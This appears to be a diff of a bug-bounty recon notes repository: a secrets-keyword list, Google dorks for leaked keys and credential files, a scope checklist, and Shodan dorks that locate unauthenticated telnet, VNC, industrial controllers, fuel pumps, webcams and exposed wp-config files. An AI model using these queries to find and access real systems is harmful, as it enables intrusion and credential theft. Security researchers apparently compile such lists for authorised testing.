     1435 +- WATSON_CONVERSATION_WORKSPACE=
     1436 +- WATSON_DEVICE=
     1437 +- WATSON_DEVICE_PASSWORD=
     1438 +- WATSON_DEVICE_TOPIC=
     1439 +- WATSON_PASSWORD=
     1440 +- WATSON_TEAM_ID=
     1441 +- WATSON_TOPIC=
     1442 +- WATSON_USERNAME=
     1443 +- WEB_CLIENT_ID=
     1444 +- webdavBaseUrlTravis=
     1445 +- WEBHOOK_URL=
     1446 +- webStorageEnabled=
     1447 +- WIDGET_BASIC_PASSWORD=
     1448 +- WIDGET_BASIC_PASSWORD_2=
     1449 +- WIDGET_BASIC_PASSWORD_3=
     1450 +- WIDGET_BASIC_PASSWORD_4=
     1451 +- WIDGET_BASIC_PASSWORD_5=
     1452 +- WIDGET_BASIC_USER=
     1453 +- WIDGET_BASIC_USER_2=
     1454 +- WIDGET_BASIC_USER_3=
     1455 +- WIDGET_BASIC_USER_4=
     1456 +- WIDGET_BASIC_USER_5=
     1457 +- WIDGET_FB_PASSWORD=
     1458 +- WIDGET_FB_PASSWORD_2=
     1459 +- WIDGET_FB_PASSWORD_3=
     1460 +- WIDGET_FB_USER=
     1461 +- WIDGET_FB_USER_2=
     1462 +- WIDGET_FB_USER_3=
     1463 +- WIDGET_TEST_SERVER=
     1464 +- WINCERT_PASSWORD=
     1465 +- WORDPRESS_DB_PASSWORD=
     1466 +- WORDPRESS_DB_USER=
     1467 +- WORKSPACE_ID=
     1468 +- WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY=
     1469 +- WPORG_PASSWORD=
     1470 +- WPT_DB_HOST=
     1471 +- WPT_DB_NAME=
     1472 +- WPT_DB_PASSWORD=
     1473 +- WPT_DB_USER=
     1474 +- WPT_PREPARE_DIR=
     1475 +- WPT_REPORT_API_KEY=
     1476 +- WPT_SSH_CONNECT=
     1477 +- WPT_SSH_PRIVATE_KEY_BASE64=
     1478 +- WPT_TEST_DIR=
     1479 +- WsleZEJBve7AFYPzR1h6Czs072X4sQlPXedcCHRhD48WgbBX0IfzTiAYCuG0=
     1480 +- WvETELcH2GqdnVPIHO1H5xnbJ8k=
     1481 +- WVNmZ40V1Lt0DYC2c6lzWwiJZFsQIXIRzJcubcwqKRoMelkbmKHdeIk=
     1482 +- WWW.GOOGLEAPIS.COM=
     1483 +- XJ7lElT4Jt9HnUw=
     1484 +- xoxp OR xoxb
     1485 +- xsax=
     1486 +- xsixFHrha3gzEAwa1hkOw6kvzR4z9dx0XmpvORuo1h4Ag0LCxAR70ZueGyStqpaXoFmTWB1z0WWwooAd0kgDwMDSOcH60Pv4mew=
     1487 +- Y8=
     1488 +- YANGSHUN_GH_PASSWORD=
     1489 +- YANGSHUN_GH_TOKEN=
     1490 +- YEi8xQ=
     1491 +- YHrvbCdCrtLtU=
     1492 +- YO0=
     1493 +- Yszo3aMbp2w=
     1494 +- YT_ACCOUNT_CHANNEL_ID=
     1495 +- YT_ACCOUNT_CLIENT_ID=
     1496 +- YT_ACCOUNT_CLIENT_SECRET=
     1497 +- YT_ACCOUNT_REFRESH_TOKEN=
     1498 +- YT_API_KEY=
     1499 +- YT_CLIENT_ID=
     1500 +- YT_CLIENT_SECRET=
     1501 +- YT_PARTNER_CHANNEL_ID=
     1502 +- YT_PARTNER_CLIENT_ID=
     1503 +- YT_PARTNER_CLIENT_SECRET=
     1504 +- YT_PARTNER_ID=
     1505 +- YT_PARTNER_REFRESH_TOKEN=
     1506 +- YT_SERVER_API_KEY=
     1507 +- YVxUZIA4Cm9984AxbYJGSk=
     1508 +- zendesk-travis-github=
     1509 +- zenSonatypePassword=
     1510 +- zenSonatypeUsername=
     1511 +- zf3iG1I1lI8pU=
     1512 +- zfp2yZ8aP9FHSy5ahNjqys4FtubOWLk=
     1513 +- ZHULIANG_GH_TOKEN=
     1514 +- ZOPIM_ACCOUNT_KEY=
     1515 +- ZZiigPX7RCjq5XHbzUpPpMbC8MFxT2K3jcFXUitfwZvNaZXJIiK3ZQJU4ayKaegLvI91x1SqH0=
     1516 +plJ2V12nLpOPwY6zTtzcoTxEN6wcvUJfHAdNovpp63hWTnbAbEZamIdxwyCqpzThDobeD354TeXFUaKvrUw00iAiIhGL2QvwapaCbhlwM6NQAmdU3tMy3nZpka6bRI1kjyTh7CXfd- wXV98ZJSiPdUFxyIgFNI2dKiL3BI1pvFDfq3mnmi3WqzZHCaQqDKNEtUrzxC40swIJGLcLUiqc5xX37P47jNDWrNIRDs8IdbM0tS9pFM=
  • ■ ■ ■ ■ ■ ■
    Recon/Google Dorks.md
     1 +# Google Dorks
     2 +## List
     3 +- inurl:example.com intitle:"index of"
     4 +- inurl:example.com intitle:"index of /" "*key.pem"
     5 +- inurl:example.com ext:log
     6 +- inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
     7 +- inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
     8 +- inurl:example.com intitle:"index of" "config.db"
     9 +- inurl:example.com allintext:"API_SECRET*" ext:env | ext:yml
     10 +- inurl:example.com intext:admin ext:sql inurl:admin
     11 +- inurl:example.com allintext:username,password filetype:log
     12 +site:example.com "-----BEGIN RSA PRIVATE KEY-----" - inurl:id_rsa
     13 +- site:codepad.co "keyword"
     14 +- site:scribd.com "keyword"
     15 +- site:npmjs.com "keyword"
     16 +- site:npm-runkit.com "keyword"
     17 +- site:libraries.io "keyword"
     18 +- site:ycombinator.io "keyword"
     19 +- site:coggle.it "keyword"
     20 +- site:papaly.com "keyword"
     21 +- site:google.com "keyword"
     22 +- site:trello.com "keyword"
     23 +- site:prezi.com "keyword"
     24 +- site:jsdelivr.net "keyword"
     25 +- site:codepen.io "keyword"
     26 +- site:codeshare.io "keyword"
     27 +- site:sharecode.io "keyword"
     28 +- site:pastebin.com "keyword"
     29 +- site:repl.it "keyword"
     30 +- site:productforums.google.com "keyword"
     31 +- site:gitter.im "keyword"
     32 +- site:bitbucket.org "keyword"
     33 +- site:*atlassian.net "keyword"
     34 +- inurl:gitlab "keyword"
     35 +- inurl:github "keyword"
  • ■ ■ ■ ■ ■ ■
    Recon/Scope.md
     1 +* ### __Small Scope__
     2 +Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
     3 +- [x] Directory Enumeration
     4 +- [x] Technology Fingerprinting
     5 +- [x] Port Scanning
     6 +- [x] Parameter Fuzzing
     7 +- [x] Wayback History
     8 +- [x] Known Vulnerabilities
     9 +- [x] Hardcoded Information in JavaScript
     10 +- [x] Domain Specific GitHub & Google Dorking
     11 +- [x] Broken Link Hijacking
     12 +- [x] Data Breach Analysis
     13 +- [x] Misconfigured Cloud Storage
     14 +* ### __Medium Scope__
     15 +Usually the scope is wild card scope where all the subdomains are part of scope
     16 +- [x] Subdomain Enumeration
     17 +- [x] Subdomain Takeover
     18 +- [x] Probing & Technology Fingerprinting
     19 +- [x] Port Scanning
     20 +- [x] Known Vulnerabilities
     21 +- [x] Template Based Scanning (Nuclei/Jeales)
     22 +- [x] Misconfigured Cloud Storage
     23 +- [x] Broken Link Hijacking
     24 +- [x] Directory Enumeration
     25 +- [x] Hardcoded Information in JavaScript
     26 +- [x] GitHub Reconnaissance
     27 +- [x] Google Dorking
     28 +- [x] Data Breach Analysis
     29 +- [x] Parameter Fuzzing
     30 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     31 +- [x] IP Range Enumeration (If in Scope)
     32 +- [x] Wayback History
     33 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     34 +- [x] Heartbleed Scanning
     35 +- [x] General Security Misconfiguration Scanning
     36 +* ### __Large Scope__
     37 +Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
     38 +- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
     39 +- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
     40 +- [x] Reverse Lookup
     41 +- [x] ASN & IP Space Enumeration and Service Identification​
     42 +- [x] Subdomain Enumeration
     43 +- [x] Subdomain Takeover
     44 +- [x] Probing & Technology Fingerprinting
     45 +- [x] Port Scanning
     46 +- [x] Known Vulnerabilities
     47 +- [x] Template Based Scanning (Nuclei/Jeales)
     48 +- [x] Misconfigured Cloud Storage
     49 +- [x] Broken Link Hijacking
     50 +- [x] Directory Enumeration
     51 +- [x] Hardcoded Information in JavaScript
     52 +- [x] GitHub Reconnaissance
     53 +- [x] Google Dorking
     54 +- [x] Data Breach Analysis
     55 +- [x] Parameter Fuzzing
     56 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     57 +- [x] IP Range Enumeration (If in Scope)
     58 +- [x] Wayback History
     59 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     60 +- [x] Heartbleed Scanning
     61 +- [x] General Security Misconfiguration Scanning
     62 +- [x] And any possible Recon Vector (Network/Web) can be applied.​
     63 + 
     64 +Source: [Link](https://www.xmind.net/m/hKKexj/)
  • ■ ■ ■ ■ ■ ■
    Recon/Shodan Dorks.md
     1 +# Shodan Dorks
     2 +## Basic
     3 +### City:
     4 +Find devices in a particular city.
     5 +```
     6 +city:"Bangalore"
     7 +```
     8 + 
     9 +### Country:
     10 +Find devices in a particular country.
     11 +```
     12 +country:"IN"
     13 +```
     14 + 
     15 +### Geo:
     16 +Find devices by giving geographical coordinates.
     17 +```
     18 +geo:"56.913055,118.250862"
     19 +```
     20 + 
     21 +### Location
     22 +```
     23 +country:us
     24 +country:ru
     25 +city:chicago
     26 +country:ru country:de city:chicago
     27 +```
     28 + 
     29 +### Hostname:
     30 +Find devices matching the hostname.
     31 +```
     32 +server: "gws" hostname:"google"
     33 +hostname:example.com
     34 +hostname:example.com,example.org
     35 +```
     36 + 
     37 +### Net:
     38 +Find devices based on an IP address or /x CIDR.
     39 +```
     40 +net:210.214.0.0/16
     41 +```
     42 + 
     43 +### Organization
     44 +```
     45 +org:microsoft
     46 +org:"United States Department"
     47 +```
     48 + 
     49 +### Autonomous System Number (ASN)
     50 +```
     51 +asn:ASxxxx
     52 +```
     53 + 
     54 +### OS:
     55 +Find devices based on operating system.
     56 +```
     57 +os:"windows 7"
     58 +```
     59 + 
     60 +### Port:
     61 +Find devices based on open ports.
     62 +```
     63 +proftpd port:21
     64 +```
     65 + 
     66 +### Before/after:
     67 +Find devices before or after between a given time.
     68 +```
     69 +apache after:22/02/2009 before:14/3/2010
     70 +```
     71 + 
     72 +### SSL/TLS Certificates
     73 +- Self signed certificates
     74 +```
     75 +ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com
     76 +```
     77 +- Expired certificates
     78 +```
     79 +ssl.cert.expired:true
     80 +ssl.cert.subject.cn:example.com
     81 +```
     82 + 
     83 +### Device Type
     84 +```
     85 +device:firewall
     86 +device:router
     87 +device:wap
     88 +device:webcam
     89 +device:media
     90 +device:"broadband router"
     91 +device:pbx
     92 +device:printer
     93 +device:switch
     94 +device:storage
     95 +device:specialized
     96 +device:phone
     97 +device:"voip phone"
     98 +device:"voip adaptor"
     99 +device:"load balancer"
     100 +device:"print server"
     101 +device:terminal
     102 +device:remote
     103 +device:telecom
     104 +device:power
     105 +device:proxy
     106 +device:pda
     107 +device:bridge
     108 +```
     109 + 
     110 +### Operating System
     111 +```
     112 +os:"windows 7"
     113 +os:"windows server 2012"
     114 +os:"linux 3.x"
     115 +```
     116 + 
     117 +### Product
     118 +```
     119 +product:apache
     120 +product:nginx
     121 +product:android
     122 +product:chromecast
     123 +```
     124 + 
     125 +### Customer Premises Equipment (CPE)
     126 +```
     127 +cpe:apple
     128 +cpe:microsoft
     129 +cpe:nginx
     130 +cpe:cisco
     131 +```
     132 + 
     133 +### Server
     134 +```
     135 +server: nginx
     136 +server: apache
     137 +server: microsoft
     138 +server: cisco-ios
     139 +```
     140 + 
     141 +### ssh fingerprints
     142 +```
     143 +dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
     144 +```
     145 + 
     146 +## Web
     147 + 
     148 +### Pulse Secure
     149 +```
     150 +http.html:/dana-na
     151 +```
     152 + 
     153 +### PEM Certificates
     154 +```
     155 +http.title:"Index of /" http.html:".pem"
     156 +```
     157 + 
     158 +## Databases
     159 +### MySQL
     160 +```
     161 +"product:MySQL"
     162 +```
     163 + 
     164 +### MongoDB
     165 +```
     166 +"product:MongoDB"
     167 +```
     168 + 
     169 +### elastic
     170 +```
     171 +port:9200 json
     172 +```
     173 + 
     174 +### Memcached
     175 +```
     176 +"product:Memcached"
     177 +```
     178 + 
     179 +### CouchDB
     180 +```
     181 +"product:CouchDB"
     182 +```
     183 + 
     184 +### PostgreSQL
     185 +```
     186 +"port:5432 PostgreSQL"
     187 +```
     188 + 
     189 +### Riak
     190 +```
     191 +"port:8087 Riak"
     192 +```
     193 + 
     194 +### Redis
     195 +```
     196 +"product:Redis"
     197 +```
     198 + 
     199 +### Cassandra
     200 +```
     201 +"product:Cassandra"
     202 +```
     203 + 
     204 +## Industrial Control Systems
     205 +### Samsung Electronic Billboards
     206 +```
     207 +"Server: Prismview Player"
     208 +```
     209 + 
     210 +### Gas Station Pump Controllers
     211 +```
     212 +"in-tank inventory" port:10001
     213 +```
     214 + 
     215 +### Fuel Pumps connected to internet:
     216 +No auth required to access CLI terminal.
     217 +```
     218 +"privileged command" GET
     219 +```
     220 + 
     221 +### Automatic License Plate Readers
     222 +```
     223 +P372 "ANPR enabled"
     224 +```
     225 + 
     226 +### Traffic Light Controllers / Red Light Cameras
     227 +```
     228 +mikrotik streetlight
     229 +```
     230 + 
     231 +### Voting Machines in the United States
     232 +```
     233 +"voter system serial" country:US
     234 +```
     235 + 
     236 +### Open ATM:
     237 +```
     238 +May allow for ATM Access availability
     239 +NCR Port:"161"
     240 +```
     241 + 
     242 +### Telcos Running Cisco Lawful Intercept Wiretaps
     243 +```
     244 +"Cisco IOS" "ADVIPSERVICESK9_LI-M"
     245 +```
     246 + 
     247 +### Prison Pay Phones
     248 +```
     249 +"[2J[H Encartele Confidential"
     250 +```
     251 + 
     252 +### Tesla PowerPack Charging Status
     253 +```
     254 +http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
     255 +```
     256 + 
     257 +### Electric Vehicle Chargers
     258 +```
     259 +"Server: gSOAP/2.8" "Content-Length: 583"
     260 +```
     261 + 
     262 +### Maritime Satellites
     263 +Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!
     264 +```
     265 +"Cobham SATCOM" OR ("Sailor" "VSAT")
     266 +```
     267 + 
     268 +### Submarine Mission Control Dashboards
     269 +```
     270 +title:"Slocum Fleet Mission Control"
     271 +```
     272 + 
     273 +### CAREL PlantVisor Refrigeration Units
     274 +```
     275 +"Server: CarelDataServer" "200 Document follows"
     276 +```
     277 + 
     278 +### Nordex Wind Turbine Farms
     279 +```
     280 +http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
     281 +```
     282 + 
     283 +### C4 Max Commercial Vehicle GPS Trackers
     284 +```
     285 +"[1m[35mWelcome on console"
     286 +```
     287 + 
     288 +### DICOM Medical X-Ray Machines
     289 +Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.
     290 +```
     291 +"DICOM Server Response" port:104
     292 +```
     293 + 
     294 +### GaugeTech Electricity Meters
     295 +```
     296 +"Server: EIG Embedded Web Server" "200 Document follows"
     297 +```
     298 + 
     299 +### Siemens Industrial Automation
     300 +```
     301 +"Siemens, SIMATIC" port:161
     302 +```
     303 + 
     304 +### Siemens HVAC Controllers
     305 +```
     306 +"Server: Microsoft-WinCE" "Content-Length: 12581"
     307 +```
     308 + 
     309 +### Door / Lock Access Controllers
     310 +```
     311 +"HID VertX" port:4070
     312 +```
     313 + 
     314 +### Railroad Management
     315 +```
     316 +"log off" "select the appropriate"
     317 +```
     318 + 
     319 +### Tesla Powerpack charging Status:
     320 +Helps to find the charging status of tesla powerpack.
     321 +```
     322 +http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
     323 +```
     324 + 
     325 +### XZERES Wind Turbine
     326 +```
     327 +title:"xzeres wind"
     328 +```
     329 + 
     330 +### PIPS Automated License Plate Reader
     331 +```
     332 +"html:"PIPS Technology ALPR Processors""
     333 +```
     334 + 
     335 +### Modbus
     336 +```
     337 +"port:502"
     338 +```
     339 + 
     340 +### Niagara Fox
     341 +```
     342 +"port:1911,4911 product:Niagara"
     343 +```
     344 + 
     345 +### GE-SRTP
     346 +```
     347 +"port:18245,18246 product:"general electric""
     348 +```
     349 + 
     350 +### MELSEC-Q
     351 +```
     352 +"port:5006,5007 product:mitsubishi"
     353 +```
     354 + 
     355 +### CODESYS
     356 +```
     357 +"port:2455 operating system"
     358 +```
     359 + 
     360 +### S7
     361 +```
     362 +"port:102"
     363 +```
     364 + 
     365 +### BACnet
     366 +```
     367 +"port:47808"
     368 +```
     369 + 
     370 +### HART-IP
     371 +```
     372 +"port:5094 hart-ip"
     373 +```
     374 + 
     375 +### Omron FINS
     376 +```
     377 +"port:9600 response code"
     378 +```
     379 + 
     380 +### IEC 60870-5-104
     381 +```
     382 +"port:2404 asdu address"
     383 +```
     384 + 
     385 +### DNP3
     386 +```
     387 +"port:20000 source address"
     388 +```
     389 + 
     390 +### EtherNet/IP
     391 +```
     392 +"port:44818"
     393 +```
     394 + 
     395 +### PCWorx
     396 +```
     397 +"port:1962 PLC"
     398 +```
     399 + 
     400 +### Crimson v3.0
     401 +```
     402 +"port:789 product:"Red Lion Controls"
     403 +```
     404 + 
     405 +### ProConOS
     406 +```
     407 +"port:20547 PLC"
     408 +```
     409 + 
     410 +## Remote Desktop
     411 +### Unprotected VNC
     412 +```
     413 +"authentication disabled" port:5900,5901
     414 +"authentication disabled" "RFB 003.008"
     415 +```
     416 + 
     417 +### Windows RDP
     418 +99.99% are secured by a secondary Windows login screen.
     419 + 
     420 +```
     421 +"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
     422 +```
     423 +## Network Infrastructure
     424 +### Hacked routers:
     425 +Routers which got compromised
     426 +```
     427 +hacked-router-help-sos
     428 +```
     429 + 
     430 +### Redis open instances
     431 +```
     432 +product:"Redis key-value store"
     433 +```
     434 + 
     435 +### Citrix:
     436 +Find Citrix Gateway.
     437 +```
     438 +title:"citrix gateway"
     439 +```
     440 + 
     441 +### Weave Scope Dashboards
     442 +Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.
     443 +```
     444 +title:"Weave Scope" http.favicon.hash:567176827
     445 +```
     446 + 
     447 +### MongoDB
     448 +Older versions were insecure by default. Very scary.
     449 +```
     450 +"MongoDB Server Information" port:27017 -authentication
     451 +```
     452 + 
     453 +### Mongo Express Web GUI
     454 +Like the infamous phpMyAdmin but for MongoDB.
     455 +```
     456 +"Set-Cookie: mongo-express=" "200 OK"
     457 +```
     458 + 
     459 +### Jenkins CI
     460 +```
     461 +"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
     462 +```
     463 + 
     464 +### Jenkins:
     465 +Jenkins Unrestricted Dashboard
     466 +```
     467 +x-jenkins 200
     468 +```
     469 + 
     470 +### Docker APIs
     471 +```
     472 +"Docker Containers:" port:2375
     473 +```
     474 + 
     475 +### Docker Private Registries
     476 +```
     477 +"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
     478 +```
     479 + 
     480 +### Pi-hole Open DNS Servers
     481 +```
     482 +"dnsmasq-pi-hole" "Recursion: enabled"
     483 +```
     484 + 
     485 +### Already Logged-In as root via Telnet
     486 +```
     487 +"root@" port:23 -login -password -name -Session
     488 +```
     489 + 
     490 +### Telnet Access:
     491 +NO password required for telnet access.
     492 +```
     493 +port:23 console gateway
     494 +```
     495 + 
     496 +### Polycom video-conference system no-auth shell
     497 +```
     498 +"polycom command shell"
     499 +```
     500 + 
     501 +### NPort serial-to-eth / MoCA devices without password
     502 +```
     503 +nport -keyin port:23
     504 +```
     505 + 
     506 +### Android Root Bridges
     507 +A tangential result of Google's sloppy fractured update approach.
     508 +```
     509 +"Android Debug Bridge" "Device" port:5555
     510 +```
     511 + 
     512 +### Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords
     513 +```
     514 +Lantronix password port:30718 -secured
     515 +```
     516 + 
     517 +### Citrix Virtual Apps
     518 +```
     519 +"Citrix Applications:" port:1604
     520 +```
     521 + 
     522 +### Cisco Smart Install
     523 +Vulnerable (kind of "by design," but especially when exposed).
     524 +```
     525 +"smart install client active"
     526 +```
     527 + 
     528 +### PBX IP Phone Gateways
     529 +```
     530 +PBX "gateway console" -password port:23
     531 +```
     532 + 
     533 +### Polycom Video Conferencing
     534 +```
     535 +http.title:"- Polycom" "Server: lighttpd"
     536 +"Polycom Command Shell" -failed port:23
     537 +```
     538 + 
     539 +### Telnet Configuration:
     540 +```
     541 +"Polycom Command Shell" -failed port:23
     542 +```
     543 + 
     544 +### Bomgar Help Desk Portal
     545 +```
     546 +"Server: Bomgar" "200 OK"
     547 +```
     548 + 
     549 +### Intel Active Management CVE-2017-5689
     550 +```
     551 +"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995
     552 +”Active Management Technology”
     553 +```
     554 + 
     555 +### HP iLO 4 CVE-2017-12542
     556 +```
     557 +HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
     558 +```
     559 + 
     560 +### Lantronix ethernet adapter’s admin interface without password
     561 +```
     562 +"Press Enter for Setup Mode port:9999"
     563 +```
     564 + 
     565 +### Wifi Passwords:
     566 +Helps to find the cleartext wifi passwords in Shodan.
     567 +```
     568 +html:"def_wirelesspassword"
     569 +```
     570 + 
     571 +### Misconfigured Wordpress Sites:
     572 +The wp-config.php if accessed can give out the database credentials.
     573 +```
     574 +http.html:"* The wp-config.php creation script uses this file"
     575 +```
     576 + 
     577 +## Outlook Web Access:
     578 +### Exchange 2007
     579 +```
     580 +"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
     581 +```
     582 + 
     583 +### Exchange 2010
     584 +```
     585 +"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
     586 +```
     587 + 
     588 +### Exchange 2013 / 2016
     589 +```
     590 +"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
     591 +```
     592 + 
     593 +### Lync / Skype for Business
     594 +```
     595 +"X-MS-Server-Fqdn"
     596 +```
     597 + 
     598 +## Network Attached Storage (NAS)
     599 +### SMB (Samba) File Shares
     600 +Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.
     601 +```
     602 +"Authentication: disabled" port:445
     603 +```
     604 + 
     605 +### Specifically domain controllers:
     606 +```
     607 +"Authentication: disabled" NETLOGON SYSVOL -unix port:445
     608 +```
     609 + 
     610 +### Concerning default network shares of QuickBooks files:
     611 +```
     612 +"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
     613 +```
     614 + 
     615 +### FTP Servers with Anonymous Login
     616 +```
     617 +"220" "230 Login successful." port:21
     618 +```
     619 + 
     620 +### Iomega / LenovoEMC NAS Drives
     621 +```
     622 +"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
     623 +```
     624 + 
     625 +### Buffalo TeraStation NAS Drives
     626 +```
     627 +Redirecting sencha port:9000
     628 +```
     629 + 
     630 +### Logitech Media Servers
     631 +```
     632 +"Server: Logitech Media Server" "200 OK"
     633 +```
     634 +### Plex Media Servers
     635 +```
     636 +"X-Plex-Protocol" "200 OK" port:32400
     637 +```
     638 + 
     639 +### Tautulli / PlexPy Dashboards
     640 +```
     641 +"CherryPy/5.1.0" "/home"
     642 +```
     643 + 
     644 +### Home router attached USB
     645 +```
     646 +"IPC$ all storage devices"
     647 +```
     648 + 
     649 +## Webcams
     650 +### D-Link webcams
     651 +```
     652 +"d-Link Internet Camera, 200 OK"
     653 +```
     654 + 
     655 +### Hipcam
     656 +```
     657 +"Hipcam RealServer/V1.0"
     658 +```
     659 + 
     660 +### Yawcams
     661 +```
     662 +"Server: yawcam" "Mime-Type: text/html"
     663 +```
     664 + 
     665 +### webcamXP/webcam7
     666 +```
     667 +("webcam 7" OR "webcamXP") http.component:"mootools" -401
     668 +```
     669 + 
     670 +### Android IP Webcam Server
     671 +```
     672 +"Server: IP Webcam Server" "200 OK"
     673 +```
     674 + 
     675 +### Security DVRs
     676 +```
     677 +html:"DVR_H264 ActiveX"
     678 +```
     679 + 
     680 +### Surveillance Cams:
     681 +With username:admin and password: :P
     682 +```
     683 +NETSurveillance uc-httpd
     684 +Server: uc-httpd 1.0.0
     685 +```
     686 + 
     687 +## Printers & Copiers:
     688 +### HP Printers
     689 +```
     690 +"Serial Number:" "Built:" "Server: HP HTTP"
     691 +```
     692 + 
     693 +### Xerox Copiers/Printers
     694 +```
     695 +ssl:"Xerox Generic Root"
     696 +```
     697 + 
     698 +### Epson Printers
     699 +```
     700 +"SERVER: EPSON_Linux UPnP" "200 OK"
     701 +"Server: EPSON-HTTP" "200 OK"
     702 +```
     703 + 
     704 +### Canon Printers
     705 +```
     706 +"Server: KS_HTTP" "200 OK"
     707 +"Server: CANON HTTP Server"
     708 +```
     709 + 
     710 +## Home Devices
     711 +### Yamaha Stereos
     712 +```
     713 +"Server: AV_Receiver" "HTTP/1.1 406"
     714 +```
     715 + 
     716 +### Apple AirPlay Receivers
     717 +Apple TVs, HomePods, etc.
     718 +```
     719 +"\x08_airplay" port:5353
     720 +```
     721 + 
     722 +### Chromecasts / Smart TVs
     723 +```
     724 +"Chromecast:" port:8008
     725 +```
     726 + 
     727 +### Crestron Smart Home Controllers
     728 +```
     729 +"Model: PYNG-HUB"
     730 +```
     731 + 
     732 +## Random Stuff
     733 +### OctoPrint 3D Printer Controllers
     734 +```
     735 +title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
     736 +```
     737 + 
     738 +### Etherium Miners
     739 +```
     740 +"ETH - Total speed"
     741 +```
     742 + 
     743 +### Apache Directory Listings
     744 +Substitute .pem with any extension or a filename like phpinfo.php.
     745 +```
     746 +http.title:"Index of /" http.html:".pem"
     747 +```
     748 + 
     749 +### Misconfigured WordPress
     750 +Exposed wp-config.php files containing database credentials.
     751 +```
     752 +http.html:"* The wp-config.php creation script uses this file"
     753 +```
     754 + 
     755 +### Too Many Minecraft Servers
     756 +```
     757 +"Minecraft Server" "protocol 340" port:25565
     758 +```
     759 + 
     760 +### Literally Everything in North Korea
     761 +```
     762 +net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
     763 +```
  • ■ ■ ■ ■ ■ ■
    Web Cache Poisoning.md
    1 1  # Web Cache Poisoning
     2 +## **Introduction**
     3 +The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users.
     4 + 
     5 +## **How to Find**
    2 6  1. Basic poisoning
    3 7  ```
    4 8  GET / HTTP/1.1
    skipped 140 lines
    145 149  HTTP/1.1 302 Found
    146 150  Location: http://noshandnibble.blog/
    147 151  ```
     152 + 
     153 +Reference:
     154 +- [Portswigger](https://portswigger.net/research/practical-web-cache-poisoning)
Please wait...
Page is in error, reload to recover